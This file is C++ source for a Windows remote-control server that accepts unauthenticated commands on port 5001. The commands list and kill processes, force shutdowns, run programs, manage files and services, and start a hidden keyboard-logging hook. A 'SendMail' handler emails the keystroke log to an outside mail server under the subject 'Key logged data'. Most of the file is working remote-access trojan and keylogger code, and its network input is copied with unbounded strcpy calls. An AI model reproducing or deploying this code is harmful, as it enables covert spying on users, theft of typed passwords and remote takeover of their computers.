/*
 * This program is free software; you can redistribute it
 * and/or modify it under the terms of the Shared Code
 * License (SCL) as published by www.IntellectualHeaven.com;
 * either version 1.0, or (at your option) any later version.
 *
 * You should have received a copy of the SCL 1.0 license,
 * look for file license.txt, along with this software; if not,
 * then please write to xx_pankaj_xx@intellectualheaven.com
 * for an electronic copy of the same.
 */

/* ++
History (in reverse order)

xx_pankaj_xx@intellectualheaven.com   2003-08-18
First version created and checked in CVS
-- */

//Project level include files
#include "stdafx.h"
#include "L_MAIN_PROCESS.h"
#include "L_PROCESS_DETAILS.h"
#include "L_FILE_DETAILS.h"
#include "L_GENERIC_SOCKET.h"
#include "L_REQUEST_FORMAT.h"
#include "all_defines.h"
#include "GlobalData.h"
#include "ReCKeybHook.h"

//System level include ffiles
#include <stdio.h>
#include <string.h>
#include <assert.h>
//#include <process.h>
#include <shellapi.h>

typedef int (*HookProc)(HWND hWnd, BOOL bCode, SOCKET arg_sock);


void set_process_privilege(	HANDLE arg_h_token,
							LPCTSTR arg_privilege,
							bool b_enable);

int process_request(
						char *arg_sz_req,
						int len,
						SOCKET arg_sz_sock);

DWORD WINAPI per_client_thread(void *p_v_param);

DWORD WINAPI main_thread(void *p_v_param)
{
	WSADATA wsaData;
		
	if(	WSAStartup(0x202, &wsaData) != 0)
	{
		//Error handling
	}


	SOCKET server_sock;

	server_sock = socket(
							AF_INET,
							SOCK_STREAM,
							0);

	if(		server_sock == INVALID_SOCKET
		)
	{
		//Error handling
		//::MessageBox(NULL, "\nFailed to create the address", "Failed",MB_OK);
		return 0;
	}


	struct sockaddr_in serv_sock_addr;
	memset(	
				&serv_sock_addr,
				'\0',
				sizeof(SOCKADDR_IN));

	serv_sock_addr.sin_addr.S_un.S_addr	= INADDR_ANY;
	serv_sock_addr.sin_family			= AF_INET;
	serv_sock_addr.sin_port				= htons(5001);

	if(	bind(
				server_sock,
				(sockaddr *)&serv_sock_addr,
				sizeof(sockaddr_in)) == SOCKET_ERROR
		)
	{
		//Error handling
		//::MessageBox(NULL, "\nFailed to bind the address", "Failed",MB_OK);
		return 0;
	}
	

	if(	listen(	
				server_sock,
				5) == SOCKET_ERROR
		)
	{
		//Error handling
	}

	while (1)
	{

		SOCKET client_sock;
		client_sock = accept(	server_sock,
								NULL,
								0);

		if (client_sock != INVALID_SOCKET)
		{

			CreateThread(	NULL,
							NULL,
							per_client_thread,
							&client_sock,
							NULL,
							NULL);
		}
	}
}


DWORD WINAPI per_client_thread(void *p_v_param)
{
	SOCKET client_sock;
	client_sock = *((SOCKET *)p_v_param);
	while(1)
	{
		char sz_data[MAX_REQUEST_SIZE+1];
		int n_bytes_to_come;
		int n_bytes_recvd = 0;
		n_bytes_recvd = CL_GENERIC_SOCKET::Receive(	client_sock,
													&n_bytes_to_come,
													SIZE_INT);

		if(		n_bytes_recvd < SIZE_INT
			)
		{
			//Connection closed, terminate this thread.
			return -1;
		}
		else
		{
			//assert(n_bytes_to_come <= MAX_REQUEST_SIZE);
			if(n_bytes_to_come > MAX_REQUEST_SIZE)
			{
				//This cannot happen, Client is flooding. Close the connection
				//and kill this thread.
				return -1;
			}
			n_bytes_recvd = CL_GENERIC_SOCKET::Receive(	client_sock,
														sz_data,
														n_bytes_to_come);

			if(		n_bytes_recvd < n_bytes_to_come
				)
			{
				//Connection closed, terminate this thread.
				return -1;
			}
		}

#if 0	//Telnet is used as client. 
		//Telnet appends \r\n at the end of each request.
		sz_data[n_bytes_recvd-2] = '\0';
#else	//My GUI based client
		sz_data[n_bytes_recvd] = '\0';
#endif

		process_request(	sz_data,
							n_bytes_to_come,
							client_sock);
		
	}
}


int process_request(
						char *arg_sz_request,
						int len,
						SOCKET arg_sz_sock)
{
	CL_REQUEST_FORMAT req_obj(	arg_sz_request,
							len);

	if(	stricmp(	req_obj.m_sz_request_name,
					"GetProcList"
					) == 0
		)
	{

		CL_MAIN_PROCESS main_process;
		
		int n_process_count;
		CL_PROCESS_DETAILS process_list[100];

		n_process_count = main_process.populate_process_list(
																process_list);
		
		for( int i = 0 ; i < n_process_count ; ++i)
		{
			int nSent = CL_GENERIC_SOCKET::Send
							(	arg_sz_sock,
								(void*)process_list[i], 
								process_list[i].void_len());

			if( nSent < process_list[i].void_len())
			{
				//Protocol error, probably connection closed
				break;
			}

			Sleep(	50
					);
		}

		int nSent = CL_GENERIC_SOCKET::Send
							(	arg_sz_sock,
								"Finish", 
								6);

		if( nSent < 6)
		{
			//Protocol error, probably connection closed
			return -1;
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"KillProcess"
							) == 0
			)
	{
		int n_pid = atoi(req_obj.get_argument(1));
		HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
									   PROCESS_VM_READ |
									   PROCESS_TERMINATE,	//Process Termination access
									   FALSE,
									   n_pid);

		if ( hProcess )
		{
			TerminateProcess(hProcess, 0);
			CloseHandle( hProcess );
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"LogOff"
							) == 0
			)
	{
		HANDLE hToken;
		if (OpenProcessToken(	GetCurrentProcess(),
								TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
								&hToken))
		{
			set_process_privilege(	hToken,
									SE_SHUTDOWN_NAME,
									true);
			ExitWindowsEx(	EWX_LOGOFF | EWX_FORCE,
							0);
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"ShutDown"
							) == 0
			)
	{
		HANDLE hToken;
		if (OpenProcessToken(	GetCurrentProcess(),
								TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
								&hToken))
		{
			set_process_privilege(	hToken,
									SE_SHUTDOWN_NAME,
									true);
			ExitWindowsEx(	EWX_SHUTDOWN | EWX_FORCE,
							0);
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"Reboot"
							) == 0
			)
	{
		HANDLE hToken;
		if (OpenProcessToken(	GetCurrentProcess(),
								TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
								&hToken))
		{
			set_process_privilege(	hToken,
									SE_SHUTDOWN_NAME,
									true);
			ExitWindowsEx(	EWX_REBOOT | EWX_FORCE,
							0);
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"StartKeyLogging"
							) == 0
			)
	{
		typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE hProcess,PBOOL Wow64Process);
		LPFN_ISWOW64PROCESS fnIsWow64Process = 
			(LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"),"IsWow64Process");

		BOOL bIsWow64 = FALSE;
		if (fnIsWow64Process != NULL)
		{
			if (fnIsWow64Process(GetCurrentProcess(),&bIsWow64))
			{
				if (bIsWow64 == TRUE)
				{
					return 0;
				}
			}
		}

		InstallHook(	g_h_wnd,
						TRUE);
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"StopKeyLogging"
							) == 0
			)
	{
		InstallHook(	g_h_wnd,
						FALSE);
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"ViewLoggedData"
							) == 0
			)
	{
		//Send now data as chunk of bytes by reading from file.
		char sz_temp_dir_name[543];
		char b_data[101];
		if(GetTempPath(	512,
						sz_temp_dir_name) != 0)
		{
			strcat(	sz_temp_dir_name,
					"\\olelog.tmp");

			FILE *fp = fopen(	sz_temp_dir_name,
								"r");
			if(fp)
			{
				while(feof(fp) == 0)
				{
					int n_read = fread(	b_data,
										1,
										100,
										fp);
					if(n_read > 0)
					{
						b_data[n_read] = '\0';
						int nSent = CL_GENERIC_SOCKET::Send
										(	arg_sz_sock,
											(void *)b_data, 
											n_read+1);

						if( nSent < n_read)
						{
							//Protocol error, probably connection closed
							break;
						}
						Sleep(	50
								);
					}
				}
				fclose(fp);
			}
			int nSent = CL_GENERIC_SOCKET::Send
								(	arg_sz_sock,
									"Finish", 
									6);

			if( nSent < 6)
			{
				//Protocol error, probably connection closed
				return -1;
			}
		}
		else
		{
			int nSent = CL_GENERIC_SOCKET::Send
								(	arg_sz_sock,
									"Finish", 
									6);

			if( nSent < 6)
			{
				//Protocol error, probably connection closed
				return -1;
			}
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"DeleteLoggedData"
							) == 0
			)
	{
		char sz_temp_dir_name[543];
		if(GetTempPath(	512,
						sz_temp_dir_name) != 0)
		{
			strcat(	sz_temp_dir_name,
					"\\olelog.tmp");

			FILE *fp = fopen(	sz_temp_dir_name,
								"w");
			fclose(fp);
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"FindFile"
							) == 0
			)
	{
		//Bring the code from file handling
		char sz_dir_name[513];
		strcpy(	sz_dir_name,
				req_obj.get_argument(1));
		
		CL_MAIN_PROCESS main_process;
		
		int n_file_count;
		CL_FILE_DETAILS *file_list;

		n_file_count = main_process.get_files_count(	sz_dir_name);

		if(n_file_count > 0)
		{
			file_list = new CL_FILE_DETAILS[n_file_count];
			n_file_count = main_process.populate_file_list(			sz_dir_name,
																	file_list);
			
			for( int i = 0 ; i < n_file_count ; ++i)
			{
				if(	strcmp(	file_list[i].m_sz_file_name,
							".") != 0 
					&&
					strcmp(	file_list[i].m_sz_file_name,
							"..") != 0
					)
				{
					int nSent = CL_GENERIC_SOCKET::Send
									(	arg_sz_sock,
										(void*)file_list[i], 
										file_list[i].void_len());

					if( nSent < file_list[i].void_len())
					{
						//Protocol error, probably connection closed
						break;
					}

					Sleep(	1
							);
				}
			}

			delete [] file_list;
		}

		int nSent = CL_GENERIC_SOCKET::Send
							(	arg_sz_sock,
								"Finish", 
								6);

		if( nSent < 6)
		{
			//Protocol error, probably connection closed
			return -1;
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"CopyFile"
							) == 0
			)
	{
		//Bring the code for copying files
		char sz_fsrc[1024];
		char sz_fdest[1024];
		strcpy(	sz_fsrc,
				req_obj.get_argument(1));

		strcpy(	sz_fdest,
				req_obj.get_argument(2));

		CopyFile(	sz_fsrc,
					sz_fdest,
					FALSE);
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"DeleteFile"
							) == 0
			)
	{
		//Bring the code for deleting files
		char sz_fsrc[1024];
		strcpy(	sz_fsrc,
				req_obj.get_argument(1));

		//DeleteFile(sz_fsrc);
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"Execute"
							) == 0
			)
	{
		//Bring the code for deleting files
		char sz_fsrc[1024];
		strcpy(	sz_fsrc,
				req_obj.get_argument(1));

		ShellExecute(	NULL,
						NULL,
						sz_fsrc,
						NULL,
						NULL,
						SW_SHOW | SW_MAXIMIZE);

		/*
		_spawnl(	_P_NOWAIT,
					sz_fsrc,
					sz_fsrc,
					NULL);
		int i = errno;
		i++;
		*/
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"MoveFile"
							) == 0
			)
	{
		char sz_fsrc[1024];
		char sz_fdest[1024];
		strcpy(	sz_fsrc,
				req_obj.get_argument(1));

		strcpy(	sz_fdest,
				req_obj.get_argument(2));
/*
		MoveFile(	sz_fsrc,
					sz_fdest);*/
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"MessageBox"
							) == 0
			)
	{
		char sz_text[256];
		char sz_caption[256];
		strcpy(	sz_text,
				req_obj.get_argument(1));

		strcpy(	sz_caption,
				req_obj.get_argument(2));

		::MessageBox(	NULL,
						sz_text,
						sz_caption,
						MB_OK | MB_ICONINFORMATION);
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"ListActiveWindows"
							) == 0
			)
	{
		//Code to find all the windows names
		HWND hWnd, hNextWnd;
		hWnd = ::FindWindow(	NULL,
								NULL);

		hNextWnd = hWnd;
		while(hNextWnd)
		{
			char sz_title[256];
			hNextWnd = ::GetNextWindow(	hWnd,
										GW_HWNDNEXT);

			if(hNextWnd)
			{
				if(::GetWindowText(	hNextWnd,
									sz_title,
									255) > 0)
				{
					int n_sent = CL_GENERIC_SOCKET::Send(	arg_sz_sock,
															(void*)sz_title,
															strlen(sz_title));

					if(n_sent < (int)strlen(sz_title))
					{
						break;
					}
					Sleep(	50
							);
				}
				hWnd = hNextWnd;
			}
		}
		
		int nSent = CL_GENERIC_SOCKET::Send
							(	arg_sz_sock,
								"Finish", 
								6);

		if( nSent < 6)
		{
			//Protocol error, probably connection closed
			return -1;
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"CloseWindow"
							) == 0
			)
	{
		char sz_title[256];
		strcpy(	sz_title,
				req_obj.get_argument(1));

		if(strlen(sz_title) > 0)
		{
			//Find window with title req_obj. 2nd arg
			HWND hWnd, hNextWnd;
			hWnd = ::FindWindow(	NULL,
									NULL);

			hNextWnd = hWnd;
			while(hNextWnd)
			{
				char sz_win_title[256];
				hNextWnd = ::GetNextWindow(	hWnd,
											GW_HWNDNEXT);

				if(hNextWnd)
				{
					if(::GetWindowText(	hNextWnd,
										sz_win_title,
										255) > 0)
					{
						if(	strcmpi(	sz_title,
										sz_win_title) == 0)
						{
							break;
						}

					}
					hWnd = hNextWnd;
				}
			}
			
			if(hNextWnd)
			{
				PostMessage(	hNextWnd,
								WM_CLOSE,
								NULL,
								NULL);
			}
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"SendMail"
							) == 0
			)
	{
		char sz_server_name[256];
		char sz_rcpt_to[256];
		strcpy(	sz_server_name,
				req_obj.get_argument(1));
		strcpy(	sz_rcpt_to,
				req_obj.get_argument(2));

		if(strlen(sz_server_name) > 0 && strlen(sz_rcpt_to) > 0)
		{
			hostent *serv_hostent;// = new hostent;
			serv_hostent = gethostbyname(sz_server_name);
			SOCKET client = socket(	AF_INET,
									SOCK_STREAM,
									0);
			if(client == SOCKET_ERROR)
			{
				//delete serv_hostent;
				return 0;
			}

			sockaddr_in serv_addr;
			serv_addr.sin_family = AF_INET;
			serv_addr.sin_port = htons(25);
			serv_addr.sin_addr.S_un.S_addr = ((IN_ADDR*)serv_hostent->h_addr)->S_un.S_addr;
			//serv_addr.sin_addr.S_un.S_addr = inet_addr("139.85.241.19");

			if(	connect(	client,
							(sockaddr*)&serv_addr,
							sizeof(sockaddr)) == SOCKET_ERROR)
			{
				int i = GetLastError();
				return 0;
			}
			char data[256];
			strcpy(	data,
					"MAIL FROM:<AutoMail@PG.com>\r\n");
			if(send(	client,
						data,
						strlen(data),
						0) == SOCKET_ERROR)
				return 0;

			//data = "RCPT TO:<pankaj_garg@operamail.com>";
			strcpy(	data,
					"RCPT TO:<");
			strcat(	data,
					sz_rcpt_to);
			strcat(	data,
					">\r\n");

			if(send(	client,
						data,
						strlen(data),
						0) == SOCKET_ERROR)
				return 0;

			strcpy(	data,
					"DATA\r\n");
			if(send(	client,
						data,
						strlen(data),
						0) == SOCKET_ERROR)
				return 0;

			strcpy(	data,
					"Subject: Key logged data\r\n\r\n\r\n");
			if(send(	client,
						data,
						strlen(data),
						0) == SOCKET_ERROR)
				return 0;

			char sz_temp_dir_name[543];
			char b_data[101];
			if(GetTempPath(	512,
							sz_temp_dir_name) != 0)
			{
				strcat(	sz_temp_dir_name,
						"\\olelog.tmp");

				FILE *fp = fopen(	sz_temp_dir_name,
									"r");
				if(fp)
				{
					while(feof(fp) == 0)
					{
						int n_read = fread(	b_data,
											1,
											100,
											fp);
						if(n_read > 0)
						{
							b_data[n_read] = '\0';
							if(send(	client,
										b_data,
										n_read,
										0) == SOCKET_ERROR)
							{
								return 0;
							}
							Sleep(	50
									);
						}
					}
					fclose(fp);
				}

			}
			if(send(	client,
						"\r\n\r\n.\r\n",
						7,
						0) == SOCKET_ERROR)
			{
				return 0;
			}
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"StartService"
							) == 0
			)
	{
		char sz_title[256];
		strcpy(	sz_title,
				req_obj.get_argument(1));

		if(strlen(sz_title) > 0)
		{
			SC_HANDLE sch_sc_mgr;
			SC_HANDLE sch_service;

			sch_sc_mgr = OpenSCManager(	NULL,
										NULL,
										SC_MANAGER_ALL_ACCESS);

			if (sch_sc_mgr)
			{
				unsigned long n_len = 255;
				char sz_service_name[256];
				GetServiceKeyName(	sch_sc_mgr,
									sz_title,
									sz_service_name,
									&n_len);
				if (n_len > 0)
				{
					sz_service_name[n_len] = '\0';
				}
				else
				{
					sz_service_name[0] = '\0';
				}

				sch_service = OpenService(	sch_sc_mgr,
											sz_service_name,
											SERVICE_ALL_ACCESS);

				SERVICE_STATUS status;
				if (sch_service)
				{
					QueryServiceStatus(	sch_service,
										&status);

					if (	status.dwCurrentState == SERVICE_STOPPED
							|| status.dwCurrentState == SERVICE_STOP_PENDING
						)
					{
						StartService(	sch_service,
										0,
										NULL);
					}
					else if (	status.dwCurrentState == SERVICE_PAUSED
								|| status.dwCurrentState == SERVICE_PAUSE_PENDING
						)
					{
						ControlService(	sch_service,
										SERVICE_CONTROL_CONTINUE,
										NULL);
					}

					CloseServiceHandle(sch_service);
				}
				CloseServiceHandle(sch_sc_mgr);
			}
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"StopService"
							) == 0
			)
	{
		char sz_title[256];
		strcpy(	sz_title,
				req_obj.get_argument(1));

		if(strlen(sz_title) > 0)
		{
			SC_HANDLE sch_sc_mgr;
			SC_HANDLE sch_service;

			sch_sc_mgr = OpenSCManager(	NULL,
										NULL,
										SC_MANAGER_ALL_ACCESS);

			if (sch_sc_mgr)
			{
				unsigned long n_len = 255;
				char sz_service_name[256];
				GetServiceKeyName(	sch_sc_mgr,
									sz_title,
									sz_service_name,
									&n_len);
				if (n_len > 0)
				{
					sz_service_name[n_len] = '\0';
				}
				else
				{
					sz_service_name[0] = '\0';
				}
				sch_service = OpenService(	sch_sc_mgr,
											sz_service_name,
											SERVICE_ALL_ACCESS);

				SERVICE_STATUS status;
				if (sch_service)
				{
					QueryServiceStatus(	sch_service,
										&status);

					ControlService(	sch_service,
									SERVICE_CONTROL_STOP,
									NULL);
					CloseServiceHandle(sch_service);
				}
				CloseServiceHandle(sch_sc_mgr);
			}
		}
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"StatusService"
							) == 0
			)
	{
		char sz_title[256];
		strcpy(	sz_title,
				req_obj.get_argument(1));

		if(strlen(sz_title) > 0)
		{
			SC_HANDLE sch_sc_mgr;
			SC_HANDLE sch_service;

			sch_sc_mgr = OpenSCManager(	NULL,
										NULL,
										SC_MANAGER_ALL_ACCESS);

			if (sch_sc_mgr)
			{
				unsigned long n_len = 255;
				char sz_service_name[256];
				GetServiceKeyName(	sch_sc_mgr,
									sz_title,
									sz_service_name,
									&n_len);
				if (n_len > 0)
				{
					sz_service_name[n_len] = '\0';
				}
				else
				{
					sz_service_name[0] = '\0';
				}

				sch_service = OpenService(	sch_sc_mgr,
											sz_service_name,
											SERVICE_QUERY_STATUS);

				SERVICE_STATUS status;
				char sz_response[256] = "Service could not be opened";
				int i = GetLastError();
				if (sch_service)
				{
					QueryServiceStatus(	sch_service,
										&status);

					if (status.dwCurrentState == SERVICE_STOPPED)
					{
						strcpy(	sz_response,
								"Service Stopped ... ");
					}
					else if (status.dwCurrentState == SERVICE_STOP_PENDING)
					{
						strcpy(	sz_response,
								"Trying to stop ...");
					}
					else if (status.dwCurrentState == SERVICE_PAUSE_PENDING)
					{
						strcpy(	sz_response,
								"Trying to stop ...");
					}
					else if (status.dwCurrentState == SERVICE_CONTINUE_PENDING)
					{
						strcpy(	sz_response,
								"Trying to start ...");
					}
					else if (status.dwCurrentState == SERVICE_PAUSED)
					{
						strcpy(	sz_response,
								"Service Stopped ... ");
					}
					else
					{
						strcpy(	sz_response,
								"Service Running ... ");
					}
					CloseServiceHandle(sch_service);
				}
				CL_GENERIC_SOCKET::Send(	arg_sz_sock,
											(void *)sz_response,
											strlen(sz_response));
				CloseServiceHandle(sch_sc_mgr);
			}
		}
	}
	/*(---Next Version---)*/
	else if(	stricmp(	req_obj.m_sz_request_name,
							"F___Window"
							) == 0
			)
	{
	}
	else if(	stricmp(	req_obj.m_sz_request_name,
							"UnF___Window"
							) == 0
			)
	{
	}
	/*!(---Next Version---)*/
	return 0;
}


void set_process_privilege(	HANDLE arg_h_token,
							LPCTSTR arg_privilege,
							bool b_enable)
{
	TOKEN_PRIVILEGES tp;
	TOKEN_PRIVILEGES tpPrevious;
	LUID luid;
	DWORD cbPrevious = sizeof (TOKEN_PRIVILEGES);

	if (!LookupPrivilegeValue(	NULL,
								arg_privilege,
								&luid))
	{
		return;
	}

	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = 0;

	AdjustTokenPrivileges(	arg_h_token,
							FALSE,
							&tp,
							sizeof (TOKEN_PRIVILEGES),
							&tpPrevious,
							&cbPrevious
							);

	if (GetLastError() != ERROR_SUCCESS)
	{
		return;
	}

	tpPrevious.PrivilegeCount = 1;
	tpPrevious.Privileges[0].Luid = luid;

	if (b_enable)
	{
		tpPrevious.Privileges[0].Attributes |= SE_PRIVILEGE_ENABLED;
	}
	else
	{
		tpPrevious.Privileges[0].Attributes ^= SE_PRIVILEGE_ENABLED & tpPrevious.Privileges[0].Attributes;
	}

	AdjustTokenPrivileges(	arg_h_token,
							FALSE,
							&tpPrevious,
							cbPrevious,
							NULL,
							NULL
							);

	if (GetLastError() != ERROR_SUCCESS)
	{
		return;
	}

	return;
}
